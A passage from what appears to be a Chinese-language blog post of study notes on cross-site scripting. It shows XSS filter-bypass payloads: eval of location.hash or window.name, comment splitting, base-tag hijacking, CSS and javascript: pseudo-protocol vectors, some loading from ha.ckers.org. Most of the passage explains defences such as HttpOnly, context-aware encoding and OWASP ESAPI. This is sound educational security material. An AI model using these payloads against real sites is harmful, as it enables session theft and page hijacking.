
<p>这样减少了字节数，也会产生攻击效果</p>
<h4 id="location-hash绕过"><a href="#location-hash绕过" class="headerlink" title="location.hash绕过"></a>location.hash绕过</h4><p>但是这样也并不是完全有效的，能缩短的字节是有限的，最好的办法是将js代码写到别的地方，再通过简短的js代码引用，最常用的一个藏代码的地方是在<strong>location.hash</strong>，更重要的是，他的内容并不会在HTTP包里发送，所以在服务端的web日志里根本不会出现，很难发现！</p>
<p>location.hash是url中锚部分，就是url后#包括后面的部分，所以只要再构造一个能执行location.hash的命令，例如</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">eval</span>(location.hash.substr(<span class="number">1</span>))</span><br></pre></td></tr></table></figure>



<h4 id="注释饶过"><a href="#注释饶过" class="headerlink" title="注释饶过"></a>注释饶过</h4><p>如果我们能控制两个文本框，我们可以尝试上面的文本框注入</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt;<span class="xml"><span class="tag">&lt;<span class="name">--</span></span></span></span><br></pre></td></tr></table></figure>

<p>下面的文本框注入</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">--&gt;<span class="xml"><span class="tag">&lt;<span class="name">script</span>&gt;</span>alert(1)<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<h3 id="使用base标签绕过"><a href="#使用base标签绕过" class="headerlink" title="使用base标签绕过"></a>使用base标签绕过</h3><p>base这个标签很危险</p>
<p>本来，如果img的src是绝对路径，而目标是一个别的服务器上的图片，那么会找不到文件，</p>
<p>但是，如果用了base标签，表示了目标host，那么img的src是可以用绝对路径的</p>
<p>如果攻击者可以插入base标签，那么web中所有绝对路径的src都会指向base标签所表示的host，那么就危险了</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;body&gt;</span><br><span class="line">&lt;base href=<span class="string">"http://www.google.com"</span> /&gt;</span><br><span class="line">&lt;img src=<span class="string">"/.../..."</span>&gt;</span><br><span class="line">&lt;<span class="regexp">/body&gt;</span></span><br><span class="line"><span class="regexp">/</span><span class="regexp">/src会默默再google网站找图片插入，如果利用，这时可能会发生木马植入</span></span><br></pre></td></tr></table></figure>

<h4 id="window-name的妙用"><a href="#window-name的妙用" class="headerlink" title="window.name的妙用"></a>window.name的妙用</h4><p>在a.com上有如下代码</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">window.name=<span class="string">"alert(document.cookie)"</span>;</span><br><span class="line">location.href=<span class="string">"http://www.xxx.com"</span></span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>他会到目标网站，只需要在目标网站执行xss语句</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">eval</span>(name);</span><br></pre></td></tr></table></figure>

<p>便会执行alert(document.cookie)</p>
<h2 id="5-XSS防御"><a href="#5-XSS防御" class="headerlink" title="5.XSS防御"></a>5.XSS防御</h2><h3 id="5-1-HttpOnly"><a href="#5-1-HttpOnly" class="headerlink" title="5.1 HttpOnly"></a>5.1 HttpOnly</h3><p>httponly可以禁止js读取cookie</p>
<p>cookie是set-cookie时设立的，httponly也是set-cookie时设立的，需要注意，服务器可能设立多个cookie，而每一个cookie都要对应一个httponly。</p>
<p>有的时候，应用需要js访问cookie，这种cookie就可以不加httponly</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"></span><br><span class="line"><span class="php">header(<span class="string">"Set-Cookie:cookie1=test1;"</span>);</span></span><br><span class="line"><span class="php">header(<span class="string">"Set-Cookie:cookie2=test2;httponly"</span>,<span class="keyword">false</span>);</span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="javascript">	alert(<span class="built_in">document</span>.cookie);</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>在这段代码中，cookie1没有httponly是可以被alert，cookie2不行</p>
<p>httponly起到了应有的作用</p>
<p>对于httponly前几年也有种绕过的方式，是用trace请求头来绕过，不过已经被解决</p>
<h3 id="5-2-输入检查"><a href="#5-2-输入检查" class="headerlink" title="5.2 输入检查"></a>5.2 输入检查</h3><p><strong>解释：在检查时还不知道具体的输出语境</strong></p>
<p>常见的WEB攻击如（XSS、SQL注入），会用到特殊字符，这些特殊字符正常用户是用不到的，所以，将这些字符禁止，可以起到抵御的效果</p>
<p>一般都是用白名单来进行防御，黑名单较于白名单而言，更加的耗费资源且安全性低，输入检查的方式就叫 <strong>XSS-filter</strong></p>
<p>但是XSS-filter会存在许多问题，最明显的，如果XSS-filter不够智能，不在适合的场景下，进行相对应的防御，可能会给用户带来不好的体验</p>
<p>比如：</p>
<p>用户输入</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span>+<span class="number">1</span>&lt;<span class="number">3</span></span><br></pre></td></tr></table></figure>

<p>但是因为‘&lt;’是被转义或者其他防御掉的，那么，用户收到的是与预期不符的结果</p>
<h3 id="5-3-输出检查"><a href="#5-3-输出检查" class="headerlink" title="5.3 输出检查"></a>5.3 输出检查</h3><p><strong>解释：在检查时已知具体输出语境</strong></p>
<p>既然输入检查存在许多问题，那么我们在输出到html的时候，可以通过编码来或转义来防御XSS攻击。</p>
<h4 id="5-3-1安全的编码函数"><a href="#5-3-1安全的编码函数" class="headerlink" title="5.3.1安全的编码函数"></a>5.3.1安全的编码函数</h4><p>针对HTML代码的编码方式是HtmlEncode，并非专用名词，他就是一个函数的实现，将字符转换成HTMLEntities，在PHP中有htmlentities()和htmlspecialchars()这两个函数可以满足安全要求</p>
<p>相应的js代码编码方式是javascriptencode。</p>
<p>虽然编码方式有所不同，但是重要的一点是一样的，都最好将输出的变量放到引号内部</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> x=<span class="number">1</span>;alert(<span class="number">1</span>);</span><br><span class="line"><span class="keyword">var</span> y=<span class="string">"1;alert(1);"</span></span><br><span class="line">第一个不安全，第二个安全</span><br></pre></td></tr></table></figure>

<p>但是很多开发者并没有注意这个，那么我们只能使用一个更严格的JavaScriptencode来保证安全，用十六进制的方式来编码</p>
<p>不过要注意，编码后的数据长度可能会变得很长，所以要注意这个细节，不要产生bug</p>
<p><strong>注</strong>：要在正确的地方使用正确的代码</p>
<h3 id="5-4-正确地防御XSS"><a href="#5-4-正确地防御XSS" class="headerlink" title="5.4 正确地防御XSS"></a>5.4 正确地防御XSS</h3><p>如果使用了MVC架构，那么XSS就发生在View层，在应用拼接到html页面的时候产生，所以在用户提交数据处进行输入检查，其实并不是在真正发生攻击的地方做防御，所以想要根治XSS问题，列出以下场景，一一解决</p>
<p>在“输出编码”的防御中，大概有这些方法：</p>
<ul>
<li>在HTML标签中输出变量</li>
<li>在HTML属性中输出变量</li>
<li>在script标签中输出变量</li>
<li>在事件中输出变量</li>
<li>在CSS中输出变量</li>
<li>在URL中输出变量</li>
</ul>
<p>下面将用变量“$var”表示用户数据，它将被填充入HTML代码中，可能存在以下场景</p>
<h4 id="在HTML标签中输出"><a href="#在HTML标签中输出" class="headerlink" title="在HTML标签中输出"></a>在HTML标签中输出</h4><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">div</span>&gt;</span>$var<span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">#</span> &gt;</span>$var<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>所有在标签中输出的变量，如果没有进行任何处理，都会导致直接产生XSS</p>
<p>在这种场景下，XSS的利用方式一般是构造一个script标签，或者是任何能够产生脚本执行方式的代码，比如</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">div</span>&gt;</span><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">alert(<span class="regexp">/xss/</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">#</span> &gt;</span><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">#</span> <span class="attr">onerror</span>=<span class="string">alert(1)</span> /&gt;</span><span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>防御方法就是对变量使用HtmlEncode</p>
<h4 id="在HTML属性中输出变量"><a href="#在HTML属性中输出变量" class="headerlink" title="在HTML属性中输出变量"></a>在HTML属性中输出变量</h4><figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="keyword">div</span> <span class="built_in">id</span>=<span class="string">"abc"</span> <span class="built_in">name</span>=<span class="string">"$var"</span>&gt;&lt;/<span class="keyword">div</span>&gt;</span><br></pre></td></tr></table></figure>

<p>与在HTML标签中输出类似，可能的攻击方法：</p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="keyword">div</span> <span class="built_in">id</span>=<span class="string">"abc"</span> <span class="built_in">name</span>=<span class="string">""</span>&gt;&lt;<span class="keyword">script</span>&gt;alert(/xss/)&lt;/<span class="keyword">script</span>&gt;&lt;<span class="string">""</span> &gt;&lt;/<span class="keyword">div</span>&gt;</span><br></pre></td></tr></table></figure>

<p>防御方法也是采用HtmlEncode</p>
<p>在OWASP ESAPI中推荐了一种更严格的HtmlEncode——除了字母、数字外，其他所有的特殊字符都被编码成HTMLEntities</p>
<figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">String safe = <span class="module-access"><span class="module"><span class="identifier">ESAPI</span>.</span></span>encoder<span class="literal">()</span>.encode<span class="constructor">ForHTMLAttribute(<span class="params">request</span>.<span class="params">getParameter</span>(<span class="string">"input"</span>)</span>);</span><br></pre></td></tr></table></figure>

<p>这种严格的编码方式，可以保证不出任何安全问题</p>
<h4 id="在script标签中输出变量"><a href="#在script标签中输出变量" class="headerlink" title="在script标签中输出变量"></a>在script标签中输出变量</h4><p>在script标签中输出时，首先应该确保输出的变量在引号中</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="actionscript"><span class="keyword">var</span> x = <span class="string">"&amp;var"</span>;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>攻击者首先需要闭合引号才能实施XSS攻击</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="javascript"><span class="keyword">var</span> x =<span class="string">""</span>;alert(<span class="regexp">/xss/</span>);<span class="comment">//";</span></span></span><br><span class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>防御时使用JavaScriptEncode</p>
<h4 id="在事件中输出变量"><a href="#在事件中输出变量" class="headerlink" title="在事件中输出变量"></a>在事件中输出变量</h4><p>在事件中输出和在script标签中输出蕾西</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a <span class="attribute">href</span>=# <span class="attribute">onclick</span>=<span class="string">"funcA('<span class="variable">$var</span>')"</span>&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p>可能的攻击方法是</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">#</span> <span class="attr">onclick</span>=<span class="string">"funcA('');alert(/xss/);//"</span> &gt;</span>test<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>防御时使用JavaScriptEncode</p>
<h4 id="在CSS中输出变量"><a href="#在CSS中输出变量" class="headerlink" title="在CSS中输出变量"></a>在CSS中输出变量</h4><p>在CSS和style、style attribute中形成XSS的方式非常多样化，参考下面几个XSS的例子</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">STYLE</span>&gt;</span><span class="css"><span class="keyword">@import</span> <span class="string">'http://ha.ckers.org/xss.css'</span>;</span><span class="tag">&lt;/<span class="name">STYLE</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">STYLE</span>&gt;</span><span class="css"><span class="selector-tag">BODY</span>&#123;<span class="attribute">-moz-binding</span>:<span class="built_in">url</span>(<span class="string">"http://ha.ckers.org/xssmoz.xml#xss"</span>)&#125;</span><span class="tag">&lt;/<span class="name">STYLE</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">XSS</span> <span class="attr">STYLE</span>=<span class="string">"behavior: url(xss.htc);"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">STYLE</span>&gt;</span><span class="css"><span class="selector-tag">li</span>  &#123;<span class="attribute">list-style-image</span>: <span class="built_in">url</span>(<span class="string">"javascript:alert('XSS')"</span>)&#125;</span><span class="tag">&lt;/<span class="name">STYLE</span>&gt;</span><span class="tag">&lt;<span class="name">UL</span>&gt;</span><span class="tag">&lt;<span class="name">LI</span>&gt;</span>XSS</span><br><span class="line"><span class="tag">&lt;<span class="name">DIV</span> <span class="attr">STYLE</span>=<span class="string">"background-image: url(javascript:alert('XSS'))"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">DIV</span> <span class="attr">STYLE</span>=<span class="string">"width: expression(alert('XSS'));"</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>所以，一般来说，尽可能禁止用户可控制的变量在<code>&lt;style&gt;标签</code>、<code>HTML标签的style属性</code>以及<code>CSS文件</code>中输出。如果一定有这样的需要，则推荐使用OWASP ESAPI中的encodeForCSS()函数</p>
<figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">String safe = <span class="module-access"><span class="module"><span class="identifier">ESAPI</span>.</span></span>encoder<span class="literal">()</span>.encode<span class="constructor">ForCSS(<span class="params">request</span>.<span class="params">getParameter</span>(<span class="string">"input"</span>)</span>);</span><br></pre></td></tr></table></figure>

<p>其实现原理类似于ESAPI.encoder().encodeForJavaScript()函数，除了字母、数字外的所有字符都被编码为十六进制形式“\uHH”</p>
<h4 id="在URL中输出变量"><a href="#在URL中输出变量" class="headerlink" title="在URL中输出变量"></a>在URL中输出变量</h4><p>在地址中输出也比较复杂。一般来说，在URL的path(路径)或者search(参数)中输出，使用URLEncode即可。URLEncode会将字符转换为“%HH”格式，比如空格就是”%20”，”&lt;”就是”%3c”</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"http://www.evil.com/?test=$var"</span> &gt;</span>test<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>可能的攻击方法</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"http://www.evil.com/?test="</span> <span class="attr">onclick</span>=<span class="string">alert(1)</span>"" &gt;</span><span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>经过URLEncode后，变成</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href&#x3D;&quot;http:&#x2F;&#x2F;www.evil.com&#x2F;?test&#x3D;%22%20onclick%3balert%281%29%22&quot; &gt;&lt;&#x2F;a&gt;</span><br></pre></td></tr></table></figure>

<p>但是还有一种情况，就是整个URL能够被用户完全控制。这时URL的Protocal和Host部分是不能使用URLEncode的，否则会改变URL的语义</p>
<p>一个URL的组成如下</p>
<blockquote>
<p>[Protocal][Host][Path][Search][Hash]</p>
</blockquote>
<p>例如</p>
<figure class="highlight cs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">https:<span class="comment">//www.evil.com/a/b/c/test?abc=123#ssss</span></span><br><span class="line"></span><br><span class="line">[<span class="meta">Protocal</span>] = https:<span class="comment">//</span></span><br><span class="line">[<span class="meta">Host</span>] = www.evil.com</span><br><span class="line">[<span class="meta">Path</span>] = /a/b/c/test</span><br><span class="line">[<span class="meta">Search</span>] = ?abc=<span class="number">123</span></span><br><span class="line">[<span class="meta">Hash</span>] = <span class="meta">#ssss</span></span><br></pre></td></tr></table></figure>

<p>在Protocal与Host中，如果使用严格的URLEncode函数，会把”://”、”.”等都编码掉了！</p>
<p>对于如下的输出方式</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a <span class="attribute">href</span>=<span class="string">"<span class="variable">$var</span>"</span>&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p>攻击者可能会构造伪协议实施攻击</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"javascript:alert(1);"</span>&gt;</span>test<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>除了<strong><u>JavaScript</u></strong>作为伪协议可以执行代码外，还有<strong><u>vbscript</u></strong>、<u><strong>dataURI</strong></u>等伪协议可能导致脚本执行</p>
<p>由此可见，如果用户能够完全控制URL，则可以执行脚本的方式有很多，如何解决这种情况呢？</p>
<p><u><em>一般来说，如果变量是整个URL，则应该先检查变量是否以”http”开头（如果不是则自动添加），以保证不会出现伪协议类的XSS攻击</em></u></p>
<p><u><em>在此之后，再对变量进行URLEncode，即可保证不会有此类的XSS发生！</em></u></p>
<p>OWASP ESAPI中有一个URLEncode的实现（此API未解决伪协议问题）</p>
<figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">String safe = <span class="module-access"><span class="module"><span class="identifier">ESAPI</span>.</span></span>encoder<span class="literal">()</span>.encode<span class="constructor">ForURL(<span class="params">request</span>.<span class="params">getParameter</span>(<span class="string">"input"</span>)</span>);</span><br></pre></td></tr></table></figure>

<p>当然，除了以上整理的这些，还有其他很多中XSS攻击方式这里并没有谈及的，只能说攻击和防御就是一个此消彼长的过程！</p>
<h3 id="5-5-处理富文本"><a href="#5-5-处理富文本" class="headerlink" title="5.5 处理富文本"></a>5.5 处理富文本</h3><p>应该禁止“事件”，因为正常的富文本是用不到的，也要禁止</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">&lt; iframe&gt;</span><span class="section">&lt; script&gt;</span><span class="section">&lt; base&gt;</span><span class="section">&lt; form&gt;</span></span><br></pre></td></tr></table></figure>

<p>等，标签的选择上应该选择白名单，避免黑名单，只允许 </p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">&lt;a&gt;</span><span class="section">&lt;img&gt;</span><span class="section">&lt;div&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="5-6正确防御DOM-base-XSS"><a href="#5-6正确防御DOM-base-XSS" class="headerlink" title="5.6正确防御DOM base XSS"></a>5.6正确防御DOM base XSS</h3><p>在js环境中，Javascriptencode是为了不让xss payload在js中产生效果，但是当js中document.write写入html的过程，会先给js中的代码解码，解完码再写入html，所以安全的防御是先JavaScriptencode再HTML encode。 在js环境中，会对js编码进行解码，比如\u的unicode，\x的十六进制形式，<code>\&#39;</code> <code>\&lt;</code> <code>\&gt;</code>等等。</p>
<p>所以如果服务器传参给js，js将参数写入html，那么不能仅仅使用JavaScriptencode或者htmlencode，而是两者一起使用，防止在&lt; script &gt;标签中和在html标签中的xss。</p>
<h3 id="5-7-防御的函数"><a href="#5-7-防御的函数" class="headerlink" title="5.7 防御的函数"></a>5.7 防御的函数</h3><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">htmlspecialchars</span><span class="params">()</span></span>：把预定义的字符转换为 HTML 实体</span><br><span class="line"><span class="function"><span class="title">Str_replace</span><span class="params">(“&gt;<span class="string">", "</span> <span class="string">" ,$str)：把危险字符替换掉</span></span></span></span><br></pre></td></tr></table></figure>



        <hr>
        <!-- Pager -->
        <ul class="pager">
          
          <li class="previous">
            <a href="/2021/03/01/CSP内容安全策略/" data-toggle="tooltip" data-placement="top" title="CSP内容安全策略">&larr; Previous Post</a>
          </li>
          
          
          <li class="next">
            <a href="/2021/02/28/Hgame-Week2-Web-forgetful/" data-toggle="tooltip" data-placement="top" title="Hgame-Week2-Web-forgetful">Next Post &rarr;</a>
          </li>
          
        </ul>

        
        <!-- tip start -->
        <div class="tip">
          <p>
            If you like this blog or find it useful for you, you are welcome to comment on it. You are also welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them. Thank you !
          </p>
        </div>
        <!-- tip end -->
        

        
        <!-- Sharing Srtart -->
        <!-- Social Social Share Post -->
<!-- Docs:https://github.com/overtrue/share.js -->

<div class="social-share" data-initialized="true" data-disabled="tencent ,douban ,qzone ,linkedin ,facebook ,google ,diandian" data-wechat-qrcode-helper="" align="center">
  <ul class="list-inline text-center social-share-ul">
    <li class="social-share-li">
      <a target="_blank" class="social-share-icon icon-twitter">
        <i class="fa fa-twitter fa-1x" aria-hidden="true"></i>
      </a>
    </li>
    <li class="social-share-li">
      <a class="social-share-icon icon-wechat">
        <i class="fa fa-weixin fa-1x" aria-hidden="true"></i>
      </a>
    </li>
    <li class="social-share-li">
      <a target="_blank" class="social-share-icon icon-weibo">
        <i class="fa fa-weibo fa-1x" aria-hidden="true"></i>
      </a>
    </li>
    <li class="social-share-li">
      <a target="_blank" class="social-share-icon icon-qq">
        <i class="fa fa-qq fa-1x" aria-hidden="true"></i>
      </a>
    </li>
    <li class="social-share-li">
      <a target="_blank" class="social-share-icon" href="mailto:?subject=跨站脚本攻击XSS的学习&body=Hi,I found this website and thought you might like it http://yoursite-url/2021/02/28/跨站脚本攻击XSS的学习/">
        <i class="fa fa-envelope fa-1x" aria-hidden="true"></i>
      </a>
    </li>
  </ul>
</div>

<!-- css & js -->
<!-- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css"> -->
<script defer="defer" async="true" src="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>

        <!-- Sharing End -->
        
        <hr>

        <!-- comments start -->
        <!-- 1. gitalk comment -->

<!-- gitalk start -->
<!-- Docs:https://github.com/gitalk/gitalk/blob/master/readme-cn.md -->

<div id="gitalk-container"></div>

<!-- <script src="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.js"></script> -->
<script src="/js/comment/gitalk.js"></script>

<script>
  var gitalk = new Gitalk({
    clientID: '',
    clientSecret: '',
    repo: '',
    owner: '',
    admin: '',
    id: 'Sun Feb 28 2021 09:46:35 GMT+0800', // Ensure uniqueness and length less than 50
    distractionFreeMode: false, // Facebook-like distraction free mode
    perPage: 10 ,
    pagerDirection: 'last',
    createIssueManually: false ,
    language: 'zh-CN'
  });
  gitalk.render('gitalk-container');

  var gtFolded = () => {
    setTimeout(function() {
      let markdownBody = document.getElementsByClassName("markdown-body");
      let list = Array.from(markdownBody);
      list.forEach(item => {
        if (item.clientHeight > 250) {
          item.classList.add('gt-comment-body-folded');
          item.style.maxHeight = '250px';
          item.title = 'Click to Expand';
          item.onclick = function() {
            item.classList.remove('gt-comment-body-folded');
            item.style.maxHeight = '';
            item.title = '';
            item.onclick = null;
          };
        }
      })
    }, 800);
  }
</script>

<!-- gitalk end -->



<!-- 2. gitment comment -->



<!-- 3. disqus comment -->


        <!-- comments end -->
        <hr>

      </div>

      <!-- Catalog: Tabe of Content -->
      <!-- Table of Contents -->

    
      <aside id="sidebar">
        <div id="toc" class="toc-article">
        <strong class="toc-title">Contents</strong>
        
          <ol class="toc-nav"><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#《白帽子讲web安全》XSS深度学习"><span class="toc-nav-number">1.</span> <span class="toc-nav-text">《白帽子讲web安全》XSS深度学习</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#1-XSS简介"><span class="toc-nav-number">1.1.</span> <span class="toc-nav-text">1.XSS简介</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#2-XSS-payload初探"><span class="toc-nav-number">1.2.</span> <span class="toc-nav-text">2.XSS payload初探</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#2-1窃取cookie"><span class="toc-nav-number">1.2.1.</span> <span class="toc-nav-text">2.1窃取cookie</span></a></li><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#2-2利用js进行post-get自动提交"><span class="toc-nav-number">1.2.2.</span> <span class="toc-nav-text">2.2利用js进行post&#x2F;get自动提交</span></a></li><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#（重点插入提示）"><span class="toc-nav-number">1.2.3.</span> <span class="toc-nav-text">（重点插入提示）</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#3-XSS-payload进阶"><span class="toc-nav-number">1.3.</span> <span class="toc-nav-text">3.XSS payload进阶</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#3-1识别用户的浏览器"><span class="toc-nav-number">1.3.1.</span> <span class="toc-nav-text">3.1识别用户的浏览器</span></a></li><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#3-2识别用户所使用的软件"><span class="toc-nav-number">1.3.2.</span> <span class="toc-nav-text">3.2识别用户所使用的软件</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#4-XSS-构造技巧"><span class="toc-nav-number">1.4.</span> <span class="toc-nav-text">4.XSS 构造技巧</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#4-1绕过长度编码"><span class="toc-nav-number">1.4.1.</span> <span class="toc-nav-text">4.1绕过长度编码</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#事件绕过"><span class="toc-nav-number">1.4.1.1.</span> <span class="toc-nav-text">事件绕过</span></a></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#location-hash绕过"><span class="toc-nav-number">1.4.1.2.</span> <span class="toc-nav-text">location.hash绕过</span></a></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#注释饶过"><span class="toc-nav-number">1.4.1.3.</span> <span class="toc-nav-text">注释饶过</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#使用base标签绕过"><span class="toc-nav-number">1.4.2.</span> <span class="toc-nav-text">使用base标签绕过</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#window-name的妙用"><span class="toc-nav-number">1.4.2.1.</span> <span class="toc-nav-text">window.name的妙用</span></a></li></ol></li></ol></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#5-XSS防御"><span class="toc-nav-number">1.5.</span> <span class="toc-nav-text">5.XSS防御</span></a><ol 